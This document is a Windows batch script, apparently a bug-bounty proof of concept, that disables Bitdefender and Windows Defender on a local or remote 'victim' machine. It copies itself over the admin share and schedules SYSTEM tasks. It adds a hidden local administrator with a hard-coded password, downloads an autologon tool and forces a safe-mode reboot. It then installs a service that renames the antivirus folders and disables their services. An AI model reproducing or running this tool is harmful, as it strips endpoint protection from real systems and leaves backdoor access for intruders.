REM - Author: Roberto Franceschetti
REM - Usage - to disable AV on local machine: C:\>Bitdefender-DisableAV-Remote.bat
REM - Usage - to disable AV on remote machine: C:\>Bitdefender-DisableAV-Remote.bat TargetComputerName (must be a hostname - IP won't work)

IF NOT [%1] == [] (GOTO Remote) ELSE (GOTO Local)

:Remote
rem - we are exploiting a remote computer - copy script to victim and schedule task to execute it
COPY "%~dp0Bitdefender-DisableAV-Remote.bat" \\%1\C$\windows\temp\Bitdefender-DisableAV-Remote.bat
powershell -command "& {$time = [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /s %1 /SC ONCE /TN 'DisableBitdefender' /TR 'C:\Windows\temp\BitdefenderCentral-DisableAV-Remote.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }"
GOTO :eof

:Local
@echo off
rem ===============part 1=============
rem create scheduled tasks
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-2' /TR 'C:\Windows\temp\DisableBitdefenderAV-2.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" > c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(2);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-3' /TR 'C:\Windows\temp\DisableBitdefenderAV-3.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(3);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-4' /TR 'C:\Windows\temp\DisableBitdefenderAV-4.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(4);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-5' /TR 'C:\Windows\temp\DisableBitdefenderAV-5.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(5);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-6' /TR 'C:\Windows\temp\DisableBitdefenderAV-6.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(6);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-7' /TR 'C:\Windows\temp\DisableBitdefenderAV-7.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(7);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-8' /TR 'C:\Windows\temp\DisableBitdefenderAV-8.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat
echo powershell -command "& {$time = [DateTime]::Now.AddMinutes(8);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /SC ONCE /TN 'DisableBitdefender-9' /TR 'C:\Windows\temp\DisableBitdefenderAV-9.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }" >> c:\windows\temp\DisableBitdefenderAV-1.bat

rem ===============part 2=============
rem - We are running .bat locally - run the exploit
rem - create local admin account used to autologin on first safe boot
echo net user BitdefenderBounty "Bitdefender123" /ADD  > c:\windows\temp\DisableBitdefenderAV-2.bat
echo net localgroup administrators BitdefenderBounty /add >> c:\windows\temp\DisableBitdefenderAV-2.bat

rem - add autologin registry entries for next reboot
echo powershell -command "& { iwr https://live.sysinternals.com/Autologon.exe -OutFile c:\windows\temp\Autologon.exe }" >> c:\windows\temp\DisableBitdefenderAV-2.bat

rem - Now configure the next reboot in safe mode and autologin

rem ===============part 3=============
echo c:\windows\temp\Autologon.exe -accepteula BitdefenderBounty . Bitdefender123 > c:\windows\temp\DisableBitdefenderAV-3.bat

rem ===============part 4=============
echo bcdedit /set {default} safeboot minimal  > c:\windows\temp\DisableBitdefenderAV-4.bat

rem ===============part 0 main in safe mode=============
rem - create the batch file executed by the DisableBitdefender service after the safe reboot
rem - will rename ProgramFiles\Bitdefender folders/filesystem drivers, disable WinDefender
rem - will remove the safebot/autologon entries and reboot

echo cd c:\windows\temp > c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Bitdefender" "Bitdefender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Bitdefender Agent" "Bitdefender Agent Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Common Files\Bitdefender" "Bitdefender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Windows Defender Advanced Threat Protection" "Windows Defender Advanced Threat Protection Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files (x86)\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\ProgramData\Bitdefender" "Bitdefender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\ProgramData\Bitdefender Agent" "Bitdefender Agent Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\ProgramData\Bitdefender VPN" "Bitdefender VPN Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat

echo sc config "BDAuxSrv" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "UPDATESRV" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "BDProtSrv" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "bdredline" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "VSSERV" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config "BdVpnService" start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc config WinDefend start=disabled >> c:\windows\temp\DisableBitdefenderAV.bat

echo timeout /t 10 >> c:\windows\temp\DisableBitdefenderAV.bat
echo net stop SAVService >> c:\windows\temp\DisableBitdefenderAV.bat
echo net stop hmpalertsvc >> c:\windows\temp\DisableBitdefenderAV.bat
echo timeout /t 10 >> c:\windows\temp\DisableBitdefenderAV.bat
echo ren "C:\Program Files\Bitdefender" "Bitdefender Disabled" >> c:\windows\temp\DisableBitdefenderAV.bat

echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f /t REG_SZ /d "0" >> c:\windows\temp\DisableBitdefenderAV.bat
echo bcdedit /deletevalue {default} safeboot >> c:\windows\temp\DisableBitdefenderAV.bat
echo sc delete DisableBitdefender >> c:\windows\temp\DisableBitdefenderAV.bat
rem - echo pause >> c:\windows\temp\DisableBitdefenderAV.bat
echo shutdown /r /f /t 0 >> c:\windows\temp\DisableBitdefenderAV.bat

rem ===============part 5=============
rem - now create the Powershell script that will create a "DisableBitdefenderAV.exe" that will simply execute the DisableBitdefenderAV.bat batch file above:
rem - this is done as Windows 10 won't allow a service to run a .bat file, but a .exe will however run once just fine even if the service fails to start

echo @echo off > c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo $source = @^^^" ^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo   using System; ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo   class Hello { ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo     static void Main() { ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo      System.Diagnostics.Process.Start(^^^"C:\\Windows\\Temp\\DisableBitdefenderAV.bat^^^"); ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo     } ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo   } ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo ^^^"@ ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat
echo echo Add-Type -TypeDefinition $source -Language CSharp -OutputAssembly ^^^"C:\Windows\Temp\DisableBitdefenderAV.exe^^^" ^>^> c:\windows\temp\CreateService.txt >> c:\windows\temp\DisableBitdefenderAV-5.bat

rem ===============part 6=============
echo ren C:\Windows\Temp\CreateService.txt  CreateService.ps1 > c:\windows\temp\DisableBitdefenderAV-6.bat

rem ===============part 7=============
rem - now execute the powershell script to create the DisableBitdefenderAV.exe file and install it as a service:
echo powershell set-executionpolicy -executionpolicy bypass > c:\windows\temp\DisableBitdefenderAV-7.bat
echo powershell c:\windows\temp\CreateService.ps1 >> c:\windows\temp\DisableBitdefenderAV-7.bat

rem ===============part 8=============
echo sc create DisableBitdefender binpath="c:\windows\temp\DisableBitdefenderAV.exe" start=auto > c:\windows\temp\DisableBitdefenderAV-8.bat

rem - this entry will allow the DisableBitdefender service to run in Safeboot as well, otherwise it won't start:
echo reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableBitdefender /f /t REG_SZ /d "service" >> c:\windows\temp\DisableBitdefenderAV-8.bat

rem - now reboot... Safe mode will be activated and the DisableBitdefenderAV.exe service will run, calling the DisableBitdefenderAV.bat script, renaming the Bitdefender folders no longer protected by Tamper Protection
rem - pause
rem ===============part 9=============

echo shutdown /r /f /t 0 > c:\windows\temp\DisableBitdefenderAV-9.bat
CALL c:\windows\temp\DisableBitdefenderAV-1.bat